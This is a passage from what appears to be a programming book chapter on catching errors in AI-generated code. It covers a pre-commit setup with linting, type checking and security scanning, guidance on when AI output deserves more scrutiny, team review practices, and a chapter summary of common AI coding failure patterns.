# .pre-commit-config.yaml
repos:
- repo: https://github.com/astral-sh/ruff-pre-commit
rev: v0.4.0
hooks:
- id: ruff
args: [--fix]
- id: ruff-format
- repo: https://github.com/pre-commit/mirrors-mypy
rev: v1.9.0
hooks:
- id: mypy
- repo: https://github.com/PyCQA/bandit
rev: 1.7.8
hooks:
- id: bandit
args: ['-r', '--severity-level', 'medium']
Best Practice: The most effective AI verification is layered. No single tool catches everything, but combining type checking, linting, security scanning, and targeted testing creates a safety net that catches most AI-generated issues before they reach production.
When to Trust AI More
AI output is more reliable when:
- The task is well-defined and common (CRUD operations, standard algorithms, common patterns)
- The prompt includes clear constraints and examples
- You are working with popular, well-documented libraries
- The generated code is short and focused
- You can easily test the output
When to Trust AI Less
AI output requires extra scrutiny when:
- The task involves security-critical logic
- The problem is novel or domain-specific
- The code interacts with external systems or APIs
- The prompt is ambiguous or underspecified
- The generated code is long and complex
- The task involves concurrency or distributed systems
- You are working with niche libraries or recent API changes
Building Organizational Resilience
For teams using AI coding assistants, consider:
- Code review remains essential. AI-generated code should go through the same review process as human-written code. Reviewers should be trained to watch for AI-specific failure patterns.
- Track AI-generated incidents. Keep a log of bugs that originated from AI-generated code. Look for patterns — this tells you where your verification process has gaps.
- Share knowledge. When someone on the team discovers a new AI failure pattern, share it with everyone. Build a team-specific "AI gotchas" document.
- Update prompts. If a particular type of error keeps recurring, update your prompt templates to explicitly guard against it.
Real-World Application: Companies that successfully adopt AI coding at scale report that their bug rates initially increase as developers learn to use AI tools, then decrease below pre-AI levels as developers internalize the trust-but-verify mindset and build automated verification pipelines. The transition period typically takes 2-3 months.
Chapter Summary
AI coding assistants are powerful tools that make mistakes. The key to using them effectively is not to avoid mistakes — that is impossible — but to catch them quickly and systematically.
We covered:
- Hallucinated APIs: AI invents functions, classes, and entire libraries. Verify imports immediately.
- Logic errors: Off-by-one, boundary conditions, race conditions, and incorrect algorithms. Test edge cases rigorously.
- Security vulnerabilities: SQL injection, XSS, hardcoded secrets, path traversal, insecure deserialization, weak crypto. Cross-reference against OWASP.
- Performance anti-patterns: N+1 queries, quadratic algorithms, blocking I/O, unnecessary copying. Review time complexity.
- Outdated patterns: Python 2 remnants, deprecated APIs, old framework patterns. Check current documentation.
- The confidence problem: AI never says "I don't know." Watch for signals and develop your "that's too easy" instinct.
- Systematic debugging: Use the VERIFY framework — Validate imports, Examine edge cases, Review security, Inspect logic, Find performance issues, Yell about types.
- Recovery strategies: Start fresh, targeted reprompt, incremental rollback, constraint fencing. Know when to abandon a conversation.
- Trust-but-verify: Use AI freely but verify rigorously. Automate verification with type checking, linting, security scanning, and tests.
The developers who are most effective with AI are not those who never encounter bugs — they are those who have systems for catching bugs before their users do. Build those systems, internalize the trust-but-verify mindset, and AI-generated code will be a massive accelerator rather than a liability.
Next chapter: Chapter 15: CLI Tools and Scripts — We move into Part III and start building real software, beginning with command-line tools and automation scripts.